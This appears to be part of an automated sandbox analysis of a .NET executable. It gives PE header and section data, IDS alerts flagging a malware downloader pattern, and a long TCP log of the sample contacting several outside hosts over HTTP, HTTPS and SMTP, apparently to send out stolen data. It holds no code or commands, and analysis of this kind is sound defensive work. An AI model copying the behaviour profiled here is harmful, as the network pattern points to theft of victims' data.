                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xd92a60x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xda0000x63c.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xdc0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xd54b40x70.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xd73000xd7400feadc594f53b948933c975675e81eb17False0.8136659770615563data7.58541302254658IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xda0000x63c0x80092cfcdf1d1bb788779e7c3f324c46707False0.3388671875data3.4838197795146737IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xdc0000xc0x200c92d48ce5e1a2b1b69d06a5a54f0eaa3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0xda0900x3acdata0.41595744680851066
                                        RT_MANIFEST0xda44c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-03T09:11:21.166324+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949708193.122.6.16880TCP
                                        2024-10-03T09:11:22.697559+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949708193.122.6.16880TCP
                                        2024-10-03T09:11:23.282454+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949710188.114.96.3443TCP
                                        2024-10-03T09:11:23.933420+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949712193.122.6.16880TCP
                                        2024-10-03T09:11:27.310384+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949716188.114.96.3443TCP
                                        2024-10-03T09:11:33.568265+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949728188.114.96.3443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 3, 2024 09:11:20.289690971 CEST4970880192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:20.294594049 CEST8049708193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:20.294667006 CEST4970880192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:20.294878960 CEST4970880192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:20.299665928 CEST8049708193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:20.929568052 CEST8049708193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:20.937781096 CEST4970880192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:20.942636967 CEST8049708193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:21.125109911 CEST8049708193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:21.166323900 CEST4970880192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:21.208715916 CEST49709443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:21.208760023 CEST44349709188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:21.209206104 CEST49709443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:21.245884895 CEST49709443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:21.245910883 CEST44349709188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:21.709742069 CEST44349709188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:21.710239887 CEST49709443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:21.733053923 CEST49709443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:21.733071089 CEST44349709188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:21.733885050 CEST44349709188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:21.775702000 CEST49709443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:22.066410065 CEST49709443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:22.107409000 CEST44349709188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:22.171569109 CEST44349709188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:22.171688080 CEST44349709188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:22.171732903 CEST49709443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:22.313587904 CEST49709443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:22.393657923 CEST4970880192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:22.398572922 CEST8049708193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:22.656675100 CEST8049708193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:22.679044008 CEST49710443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:22.679084063 CEST44349710188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:22.679140091 CEST49710443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:22.679630995 CEST49710443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:22.679646015 CEST44349710188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:22.697559118 CEST4970880192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:23.138896942 CEST44349710188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:23.145056963 CEST49710443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:23.145102024 CEST44349710188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:23.282471895 CEST44349710188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:23.282558918 CEST44349710188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:23.282614946 CEST49710443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:23.283164978 CEST49710443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:23.286952019 CEST4970880192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:23.288161993 CEST4971280192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:23.292068005 CEST8049708193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:23.292957067 CEST8049712193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:23.293024063 CEST4970880192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:23.293056011 CEST4971280192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:23.293189049 CEST4971280192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:23.297945023 CEST8049712193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:23.933223009 CEST8049712193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:23.933419943 CEST4971280192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:23.934550047 CEST49714443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:23.934588909 CEST44349714188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:23.934793949 CEST49714443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:23.935081005 CEST49714443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:23.935097933 CEST44349714188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:23.938524008 CEST8049712193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:23.938576937 CEST4971280192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:24.569355965 CEST44349714188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:24.570895910 CEST49714443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:24.570931911 CEST44349714188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:24.718875885 CEST44349714188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:24.718975067 CEST44349714188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:24.719028950 CEST49714443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:24.719371080 CEST49714443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:24.723687887 CEST4971580192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:24.728516102 CEST8049715193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:24.728606939 CEST4971580192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:24.728694916 CEST4971580192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:24.733474016 CEST8049715193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:26.712038994 CEST8049715193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:26.712404013 CEST8049715193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:26.712444067 CEST8049715193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:26.712491989 CEST4971580192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:26.712519884 CEST4971580192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:26.712949038 CEST8049715193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:26.713819027 CEST49716443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:26.713829041 CEST4971580192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:26.713870049 CEST44349716188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:26.713922977 CEST49716443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:26.714160919 CEST49716443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:26.714169979 CEST44349716188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:27.167238951 CEST44349716188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:27.170846939 CEST49716443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:27.170866966 CEST44349716188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:27.310388088 CEST44349716188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:27.310472012 CEST44349716188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:27.310585976 CEST49716443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:27.311333895 CEST49716443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:27.314930916 CEST4971580192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:27.316139936 CEST4971780192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:27.320173025 CEST8049715193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:27.320287943 CEST4971580192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:27.321029902 CEST8049717193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:27.321111917 CEST4971780192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:27.321232080 CEST4971780192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:27.326199055 CEST8049717193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:27.945125103 CEST8049717193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:27.946691990 CEST49718443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:27.946748972 CEST44349718188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:27.946830034 CEST49718443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:27.947071075 CEST49718443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:27.947088003 CEST44349718188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:27.994497061 CEST4971780192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:28.403928041 CEST44349718188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:28.405663967 CEST49718443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:28.405709982 CEST44349718188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:28.548190117 CEST44349718188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:28.548295021 CEST44349718188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:28.548346996 CEST49718443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:28.548876047 CEST49718443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:28.552455902 CEST4971780192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:28.553077936 CEST4971980192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:28.557461023 CEST8049717193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:28.557519913 CEST4971780192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:28.557843924 CEST8049719193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:28.557913065 CEST4971980192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:28.557998896 CEST4971980192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:28.562711954 CEST8049719193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:29.784427881 CEST8049719193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:29.785913944 CEST49720443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:29.785969973 CEST44349720188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:29.786057949 CEST49720443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:29.786325932 CEST49720443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:29.786344051 CEST44349720188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:29.838267088 CEST4971980192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:30.244626999 CEST44349720188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:30.246438980 CEST49720443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:30.246478081 CEST44349720188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:30.378891945 CEST44349720188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:30.378988981 CEST44349720188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:30.379066944 CEST49720443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:30.379710913 CEST49720443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:30.383759022 CEST4971980192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:30.385169029 CEST4972180192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:30.389024973 CEST8049719193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:30.389199972 CEST4971980192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:30.390007973 CEST8049721193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:30.390110970 CEST4972180192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:30.390239954 CEST4972180192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:30.395047903 CEST8049721193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:31.019678116 CEST8049721193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:31.021054983 CEST49722443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:31.021112919 CEST44349722188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:31.021224976 CEST49722443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:31.021481037 CEST49722443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:31.021492958 CEST44349722188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:31.072642088 CEST4972180192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:31.481098890 CEST44349722188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:31.482865095 CEST49722443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:31.482882977 CEST44349722188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:31.624140024 CEST44349722188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:31.624408960 CEST44349722188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:31.624458075 CEST49722443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:31.625216961 CEST49722443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:31.631808043 CEST4972180192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:31.633333921 CEST4972380192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:31.637026072 CEST8049721193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:31.637087107 CEST4972180192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:31.638120890 CEST8049723193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:31.638194084 CEST4972380192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:31.638338089 CEST4972380192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:31.643131018 CEST8049723193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:32.939493895 CEST8049723193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:32.940901041 CEST49728443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:32.940944910 CEST44349728188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:32.941009998 CEST49728443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:32.941349030 CEST49728443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:32.941364050 CEST44349728188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:32.994489908 CEST4972380192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:33.423326015 CEST44349728188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:33.424932957 CEST49728443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:33.424957037 CEST44349728188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:33.568279982 CEST44349728188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:33.568381071 CEST44349728188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:33.568428040 CEST49728443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:33.569072008 CEST49728443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:33.572349072 CEST4972380192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:33.573602915 CEST4973080192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:33.577547073 CEST8049723193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:33.577605963 CEST4972380192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:33.578409910 CEST8049730193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:33.578475952 CEST4973080192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:33.578594923 CEST4973080192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:33.583372116 CEST8049730193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:35.391427040 CEST8049730193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:35.392817974 CEST49731443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:35.392878056 CEST44349731188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:35.392980099 CEST49731443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:35.393275976 CEST49731443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:35.393290043 CEST44349731188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:35.431996107 CEST4973080192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:35.874568939 CEST44349731188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:35.882664919 CEST49731443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:35.882695913 CEST44349731188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:36.017724037 CEST44349731188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:36.017813921 CEST44349731188.114.96.3192.168.2.9
                                        Oct 3, 2024 09:11:36.017910957 CEST49731443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:36.018470049 CEST49731443192.168.2.9188.114.96.3
                                        Oct 3, 2024 09:11:36.045089006 CEST4973080192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:36.050854921 CEST8049730193.122.6.168192.168.2.9
                                        Oct 3, 2024 09:11:36.050909042 CEST4973080192.168.2.9193.122.6.168
                                        Oct 3, 2024 09:11:36.054341078 CEST49732443192.168.2.9149.154.167.220
                                        Oct 3, 2024 09:11:36.054393053 CEST44349732149.154.167.220192.168.2.9
                                        Oct 3, 2024 09:11:36.054508924 CEST49732443192.168.2.9149.154.167.220
                                        Oct 3, 2024 09:11:36.054941893 CEST49732443192.168.2.9149.154.167.220
                                        Oct 3, 2024 09:11:36.054965973 CEST44349732149.154.167.220192.168.2.9
                                        Oct 3, 2024 09:11:36.683969975 CEST44349732149.154.167.220192.168.2.9
                                        Oct 3, 2024 09:11:36.684037924 CEST49732443192.168.2.9149.154.167.220
                                        Oct 3, 2024 09:11:36.687719107 CEST49732443192.168.2.9149.154.167.220
                                        Oct 3, 2024 09:11:36.687731981 CEST44349732149.154.167.220192.168.2.9
                                        Oct 3, 2024 09:11:36.688038111 CEST44349732149.154.167.220192.168.2.9
                                        Oct 3, 2024 09:11:36.689467907 CEST49732443192.168.2.9149.154.167.220
                                        Oct 3, 2024 09:11:36.735409975 CEST44349732149.154.167.220192.168.2.9
                                        Oct 3, 2024 09:11:36.929028034 CEST44349732149.154.167.220192.168.2.9
                                        Oct 3, 2024 09:11:36.929115057 CEST44349732149.154.167.220192.168.2.9
                                        Oct 3, 2024 09:11:36.929326057 CEST49732443192.168.2.9149.154.167.220
                                        Oct 3, 2024 09:11:36.934967041 CEST49732443192.168.2.9149.154.167.220
                                        Oct 3, 2024 09:11:43.788471937 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:43.794238091 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:43.794338942 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:44.422297955 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:44.422511101 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:44.427664042 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:44.651324987 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:44.652264118 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:44.659862041 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:44.883759022 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:44.884047985 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:44.888870001 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:45.112962008 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:45.113364935 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:45.118187904 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:45.481303930 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:45.481457949 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:45.486260891 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:45.713601112 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:45.713757992 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:45.718631029 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:46.141494036 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:46.142318010 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:46.142410040 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:46.142410040 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:46.142446041 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:46.147296906 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:46.147330046 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:46.147443056 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:46.147473097 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:46.561744928 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:46.603909969 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:48.074827909 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:48.079824924 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:48.303304911 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:48.303553104 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:48.304615974 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:48.309473038 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:48.309578896 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:48.311326027 CEST5874973377.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:48.311405897 CEST49733587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:49.818443060 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:49.818744898 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:49.819036961 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:49.819098949 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:49.819428921 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:49.819479942 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:49.822271109 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:49.822313070 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:49.823704004 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:50.049725056 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:50.049994946 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:50.054946899 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:50.281033993 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:50.281378984 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:50.286338091 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:50.610210896 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:50.610495090 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:50.615364075 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:50.844310999 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:50.844556093 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:50.849395037 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:51.082515955 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:51.082670927 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:51.087563038 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:51.575171947 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:51.575675964 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:51.575930119 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:51.576118946 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:11:51.576186895 CEST49734587192.168.2.977.245.159.27
